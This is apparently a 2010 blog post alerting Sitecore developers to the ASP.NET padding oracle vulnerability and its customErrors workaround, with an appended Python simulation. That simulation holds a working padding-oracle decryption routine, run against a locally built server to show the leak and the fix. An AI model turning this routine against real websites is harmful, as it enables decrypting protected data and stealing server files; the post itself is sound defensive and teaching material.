Monday, September 20, 2010

ASP.NET Vulnerability Allows Downloading of Server Files (and Decrypting ViewState)

ANOTHER UPDATE: Sitecore released a fix last Friday on SDN.

UPDATE: A FAQ that details more about the workaround and the vulnerability was released on Sep 20.

Yes.  You read that right.  An attacker who can send requests to any ASP.NET-based website or application can use the server's own error responses as a "padding oracle": by sending many modified copies of an encrypted value and watching whether the server answers with a padding error or with some other error, they can decrypt that value byte by byte without ever learning the key.  That means your site's ViewState, and any other data ASP.NET encrypts for you, can be read.  The same oracle also lets the attacker forge encrypted values the server trusts, and that is what makes it possible to download files that should never leave the server, such as web.config (which often holds connection strings and the machineKey itself).
I'm posting this here because Sitecore is obviously ASP.NET-based.  So, here's the post from Scott Guthrie on the workaround and more information about the vulnerability.  The short version of the workaround: turn on customErrors with one and the same error page for every error, so that all failures look identical to the attacker (on .NET 3.5 SP1 and 4.0 the post also adds a random delay in that page, since response time can leak the same bit).  Spread it around and let's make sure our community is safe and keep Sitecore's integrity intact (even though this is not even about Sitecore).  You know how that works : ).
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
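Added example, not from the original post and not Scott Guthrie's code: a self-contained Python simulation of the padding oracle described above. The server, the keys, the sample ViewState-like string and the HTTP-style status codes are all constructed here, and a toy Feistel block cipher stands in for AES (the attack depends only on CBC chaining, never on the cipher's internals). handle_request plays the server in two configurations: one that answers a padding failure with a different status than a MAC failure, and one that sends every failure to the same error page, which is what the customErrors workaround does. padding_oracle_decrypt plays the attacker; it recovers the plaintext from the first server and gives up against the second.

```python
import hashlib
import hmac
import os

BLOCK = 16
KEY, MAC_KEY = os.urandom(16), os.urandom(16)   # server secrets; the attacker never sees them

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 4-round Feistel block cipher built on SHA-256. It stands in for AES because the
# attack below depends only on CBC chaining, not on the block cipher's internals.
def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def enc_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def dec_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = enc_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        out += _xor(dec_block(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return out

def protect(plaintext):
    """Server side: token = IV || CBC(pad(plaintext || HMAC tag)), i.e. MAC-then-encrypt."""
    tag = hmac.new(MAC_KEY, plaintext, hashlib.sha256).digest()[:16]
    padded = plaintext + tag
    padded += bytes([BLOCK - len(padded) % BLOCK]) * (BLOCK - len(padded) % BLOCK)
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(KEY, iv, padded)

def handle_request(token, uniform_errors):
    """Server endpoint; returns an HTTP-style status code (constructed for this demo).
    uniform_errors=False: bad padding -> 500, bad MAC -> 404. That difference is the oracle.
    uniform_errors=True: every failure -> 302 to one error page (the customErrors workaround)."""
    try:
        data = pkcs7_unpad(cbc_decrypt(KEY, token[:BLOCK], token[BLOCK:]))
        body, tag = data[:-16], data[-16:]
        expected = hmac.new(MAC_KEY, body, hashlib.sha256).digest()[:16]
        if not hmac.compare_digest(tag, expected):
            raise PermissionError("bad mac")
        return 200
    except ValueError:
        return 302 if uniform_errors else 500
    except PermissionError:
        return 302 if uniform_errors else 404

def padding_oracle_decrypt(token, oracle):
    """Attacker side: recover the plaintext behind `token` from the oracle's status codes
    alone. Returns None when the responses do not single out padding errors."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)                  # D_k(target), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            fake = bytearray(inter[j] ^ pad if j > pos else 0 for j in range(BLOCK))
            hits = []
            for guess in range(256):
                fake[pos] = guess
                if oracle(bytes(fake) + target) == 500:
                    continue
                if pos == BLOCK - 1:              # rule out an accidental "..02 02" style hit
                    probe = bytearray(fake)
                    probe[pos - 1] ^= 1
                    if oracle(bytes(probe) + target) == 500:
                        continue
                hits.append(guess)
            if len(hits) != 1:                    # 0 or 256 hits: the oracle is not leaking
                return None
            inter[pos] = hits[0] ^ pad
        recovered += _xor(inter, prev)            # plaintext block = D_k(C_i) xor C_(i-1)
    return recovered

def demo():
    # Constructed sample: a ViewState-like secret the attacker wants to read.
    secret = b"__VIEWSTATE: user=admin; role=editor"
    token = protect(secret)
    leaky = padding_oracle_decrypt(token, lambda t: handle_request(t, False))
    fixed = padding_oracle_decrypt(token, lambda t: handle_request(t, True))
    return leaky, fixed
```

Calling demo() returns the recovered padded plaintext (secret, tag and padding) for the verbose server and None for the uniform one, after a few thousand requests per block. The simulation only models status codes; a real server can leak the same bit through response time, which is why the workaround page in Scott Guthrie's post also sleeps for a random interval.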

5 comments:

  1. Hi,

    but the problem with the solution is that it advises using customErrors with defaultRedirect.

    I have tried the fix and unfortunately it still generates a unique URL for each page.

    Any advice here?

  2. Hello Szymon,

    I'm not entirely sure what you mean by "it still generated unique url for unique page". Can you elaborate more? Are you using ASP.NET 3.5/4.0? Do you have elements in your customErrors? Is your error page a Web form or static HTML file?

  3. Yesterday Microsoft released a security update that addresses the ASP.NET Security Vulnerability http://bit.ly/ceTwHz
